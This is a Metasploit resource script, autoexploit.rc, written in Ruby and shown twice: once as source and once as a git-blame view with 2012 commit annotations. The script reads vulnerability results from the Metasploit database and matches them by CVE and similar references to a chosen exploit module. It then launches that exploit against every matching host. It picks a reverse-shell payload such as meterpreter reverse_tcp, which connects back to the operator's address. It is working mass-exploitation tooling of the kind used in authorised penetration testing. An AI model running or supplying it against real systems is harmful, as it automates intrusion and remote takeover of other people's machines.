scripts/resource/autoexploit.rc

# easy-autoexploiter.rc
# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de)


<ruby>
#
# Print the help function
#
def help_me
	help = %Q|
	Description:
		This Metasploit RC file can be used to automate the exploitation process.  Before
		using this script, you should import your vulnerability results to Metasploit, and
		then it will exploit each possible host when there is a match to one of the
		references.  A reverse shell is automatically selected for you, and will always
		default to a suitable meterpreter.

	Usage:
		./msfconsole -r [rc_path] [db_user] [db_pass] [db_workspace] [module_path]

	Arguments:
		rc_path      - Full path to the RC script
		db_user      - Username for MSF database
		db_pass      - Password for MSF database
		db_worksapce - Workspace for the database
		module_path  - Path to the exploit (ie: windows/smb/ms08_067_netapi)

	Authors:
		m-1-k-3 <m1k3[at]s3cur1ty.de>
		sinn3r  <sinn3r[at]metasploit.com>
	|

	help = help.gsub(/^\t/, '')
	print_line(help)
end


#
# Load an exploit
#
def load_exploit(path)
	framework.exploits.create(path)
end


#
# See if there is any unmatched refs
#
def ref_has_match(vuln_refs, exp_refs)
	# exp_refs is an array of URLs
	# vuln_refs is a collection of Mdm::Ref, with 'name' being the most useful info
	# (may contain a link)
	vuln_refs.each do |ref|
		n = ref.name
		n = n.gsub(/^CVE\-/, '')
		n = n.gsub(/^OSVDB\-/, '')
		n = n.gsub(/^MSB\-/, '')
		n = n.gsub(/^EDB-/, '')

		exp_refs.each { |e| return true if e.to_s =~ /#{n}/ }
	end

	return false
end


#
# Automatically select a payload in this order:
# Windows meterpreter, linux, osx, php, java, generic
#
def select_payload(exploit)
	windows = 'windows/meterpreter/reverse_tcp'
	linux   = 'linux/x86/reverse_tcp'
	osx     = 'osx/x86/shell_reverse_tcp'
	php     = 'php/meterpreter_reverse_tcp'
	multi   = 'java/meterpreter/reverse_tcp'
	generic = 'generic/shell_reverse_tcp'

	payloads = []
	exploit.compatible_payloads.each do |p|
		payloads << p[0]
	end

	if payloads.include?(windows)
		return windows
	elsif payloads.include?(linux)
		return linux
	elsif payloads.include?(php)
		return php
	elsif payloads.include?(multi)
		return multi
	elsif payloads.include?(generic)
		return generic
	else
		# WTF? This exploit supports NONE of our favorite payloads?
		# What kinda BS is this?
		return nil
	end
end


#
# Connect to the database
#
def init_db(username, password, workspace)
	# Check params
	if username.empty? or password.empty?
		raise RuntimeError, "You must have a credential to connect to your database"
	end

	print_status("Connecting to database: #{workspace}")
	run_single("db_connect #{username}:#{password}@localhost:5432/#{workspace}")
end


#
# Start the exploitation
#
def auto_exploit(module_path)
	exploit = load_exploit(module_path)

	if exploit.nil?
		# Force msfconsole to abort, because we failed to initialize the rc script properly
		raise RuntimeError, "Exploit not found: #{module_path}"
	end

	exploit_refs = exploit.references

	get_payload = select_payload(exploit)
	lhost       = Rex::Socket.source_address('50.50.50.50')

	if get_payload.nil?
		raise RuntimeError, "No payload selected for this exploit"
	else
		print_status("Payload selected: #{get_payload} (lhost=#{lhost})")
	end

	framework.db.workspace.vulns.each do |vuln|
		next if not ref_has_match(vuln.refs, exploit_refs)
		print_status("Using #{exploit.shortname} against host #{vuln.host.address.to_s}")
		run_single("use #{exploit.fullname}")
		run_single("set RHOST #{vuln.host.address.to_s}")
		run_single("set payload #{get_payload}")
		run_single("set lhost #{lhost}")
		run_single("exploit -z")
		select(nil, nil, nil, 1)
		run_single("back")
	end
end


# Print help upon request
if ARGV.join('') =~ /^help$/i
	help_me
	run_single('exit')
	return
end

#[db_user] [db_pass] [db_workspace] [module_path]
u = ARGV.shift || 'postgres'  #default username in msf manual
p = ARGV.shift || ''
w = ARGV.shift || 'msf'       #default workspace in msf manual
m = ARGV.shift || ''

# Initilize the database
begin
	init_db(u, p, w)
rescue RuntimeError => e
	print_error(e.message)
	run_single('exit')
	return
rescue ::Exception => e
	raise e
end

# Run auto exploit
begin
	if framework.datastore['MODULE'].nil?
		auto_exploit(m)
	else
		auto_exploit(framework.datastore['MODULE'])
	end
rescue RuntimeError => e
	print_error(e.message)
	run_single('exit')
	return
end
</ruby>
Add autoexploit.rc based on #561 2012-07-06 15:02:28 -05:00			`# easy-autoexploiter.rc`
			`# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de)`


			`<ruby>`
			`#`
			`# Print the help function`
			`#`
			`def help_me`
			`help = %Q\|`
Change description a little bit 2012-07-06 16:18:14 -05:00			`Description:`
			`This Metasploit RC file can be used to automate the exploitation process. Before`
Add autoexploit.rc based on #561 2012-07-06 15:02:28 -05:00			`using this script, you should import your vulnerability results to Metasploit, and`
Change description a little bit 2012-07-06 16:18:14 -05:00			`then it will exploit each possible host when there is a match to one of the`
			`references. A reverse shell is automatically selected for you, and will always`
			`default to a suitable meterpreter.`
Add autoexploit.rc based on #561 2012-07-06 15:02:28 -05:00
			`Usage:`
			`./msfconsole -r [rc_path] [db_user] [db_pass] [db_workspace] [module_path]`

			`Arguments:`
Change description a little bit 2012-07-06 16:18:14 -05:00			`rc_path - Full path to the RC script`
			`db_user - Username for MSF database`
			`db_pass - Password for MSF database`
Add autoexploit.rc based on #561 2012-07-06 15:02:28 -05:00			`db_worksapce - Workspace for the database`
Change description a little bit 2012-07-06 16:18:14 -05:00			`module_path - Path to the exploit (ie: windows/smb/ms08_067_netapi)`
Remove a whitespace 2012-07-06 16:20:17 -05:00
Add autoexploit.rc based on #561 2012-07-06 15:02:28 -05:00			`Authors:`
Change description a little bit 2012-07-06 16:18:14 -05:00			`m-1-k-3 <m1k3[at]s3cur1ty.de>`
			`sinn3r <sinn3r[at]metasploit.com>`
Add autoexploit.rc based on #561 2012-07-06 15:02:28 -05:00			`\|`
Remove a whitespace 2012-07-06 16:20:17 -05:00
Add autoexploit.rc based on #561 2012-07-06 15:02:28 -05:00			`help = help.gsub(/^\t/, '')`
			`print_line(help)`
			`end`


			`#`
			`# Load an exploit`
			`#`
			`def load_exploit(path)`
			`framework.exploits.create(path)`
			`end`


			`#`
			`# See if there is any unmatched refs`
			`#`
			`def ref_has_match(vuln_refs, exp_refs)`
			`# exp_refs is an array of URLs`
			`# vuln_refs is a collection of Mdm::Ref, with 'name' being the most useful info`
			`# (may contain a link)`
			`vuln_refs.each do \|ref\|`
			`n = ref.name`
			`n = n.gsub(/^CVE\-/, '')`
			`n = n.gsub(/^OSVDB\-/, '')`
			`n = n.gsub(/^MSB\-/, '')`
			`n = n.gsub(/^EDB-/, '')`

			`exp_refs.each { \|e\| return true if e.to_s =~ /#{n}/ }`
			`end`

			`return false`
			`end`


			`#`
			`# Automatically select a payload in this order:`
			`# Windows meterpreter, linux, osx, php, java, generic`
			`#`
			`def select_payload(exploit)`
			`windows = 'windows/meterpreter/reverse_tcp'`
			`linux = 'linux/x86/reverse_tcp'`
			`osx = 'osx/x86/shell_reverse_tcp'`
			`php = 'php/meterpreter_reverse_tcp'`
			`multi = 'java/meterpreter/reverse_tcp'`
			`generic = 'generic/shell_reverse_tcp'`

			`payloads = []`
			`exploit.compatible_payloads.each do \|p\|`
			`payloads << p[0]`
			`end`

			`if payloads.include?(windows)`
			`return windows`
			`elsif payloads.include?(linux)`
			`return linux`
			`elsif payloads.include?(php)`
			`return php`
			`elsif payloads.include?(multi)`
			`return multi`
			`elsif payloads.include?(generic)`
			`return generic`
			`else`
			`# WTF? This exploit supports NONE of our favorite payloads?`
			`# What kinda BS is this?`
Properly handle a no-payload-selected scenario 2012-07-06 16:32:18 -05:00			`return nil`
Add autoexploit.rc based on #561 2012-07-06 15:02:28 -05:00			`end`
			`end`


			`#`
			`# Connect to the database`
			`#`
			`def init_db(username, password, workspace)`
			`# Check params`
			`if username.empty? or password.empty?`
			`raise RuntimeError, "You must have a credential to connect to your database"`
			`end`

			`print_status("Connecting to database: #{workspace}")`
			`run_single("db_connect #{username}:#{password}@localhost:5432/#{workspace}")`
			`end`


			`#`
			`# Start the exploitation`
			`#`
			`def auto_exploit(module_path)`
			`exploit = load_exploit(module_path)`

			`if exploit.nil?`
			`# Force msfconsole to abort, because we failed to initialize the rc script properly`
			`raise RuntimeError, "Exploit not found: #{module_path}"`
			`end`

			`exploit_refs = exploit.references`

			`get_payload = select_payload(exploit)`
			`lhost = Rex::Socket.source_address('50.50.50.50')`
Properly handle a no-payload-selected scenario 2012-07-06 16:32:18 -05:00
			`if get_payload.nil?`
			`raise RuntimeError, "No payload selected for this exploit"`
			`else`
			`print_status("Payload selected: #{get_payload} (lhost=#{lhost})")`
			`end`
Add autoexploit.rc based on #561 2012-07-06 15:02:28 -05:00
			`framework.db.workspace.vulns.each do \|vuln\|`
			`next if not ref_has_match(vuln.refs, exploit_refs)`
			`print_status("Using #{exploit.shortname} against host #{vuln.host.address.to_s}")`
			`run_single("use #{exploit.fullname}")`
			`run_single("set RHOST #{vuln.host.address.to_s}")`
			`run_single("set payload #{get_payload}")`
			`run_single("set lhost #{lhost}")`
			`run_single("exploit -z")`
			`select(nil, nil, nil, 1)`
			`run_single("back")`
			`end`
			`end`


			`# Print help upon request`
			`if ARGV.join('') =~ /^help$/i`
			`help_me`
			`run_single('exit')`
			`return`
			`end`

			`#[db_user] [db_pass] [db_workspace] [module_path]`
			`u = ARGV.shift \|\| 'postgres' #default username in msf manual`
			`p = ARGV.shift \|\| ''`
			`w = ARGV.shift \|\| 'msf' #default workspace in msf manual`
			`m = ARGV.shift \|\| ''`

			`# Initilize the database`
			`begin`
			`init_db(u, p, w)`
			`rescue RuntimeError => e`
			`print_error(e.message)`
			`run_single('exit')`
			`return`
			`rescue ::Exception => e`
			`raise e`
			`end`

			`# Run auto exploit`
			`begin`
			`if framework.datastore['MODULE'].nil?`
			`auto_exploit(m)`
			`else`
			`auto_exploit(framework.datastore['MODULE'])`
			`end`
			`rescue RuntimeError => e`
			`print_error(e.message)`
			`run_single('exit')`
			`return`
			`end`
			`</ruby>`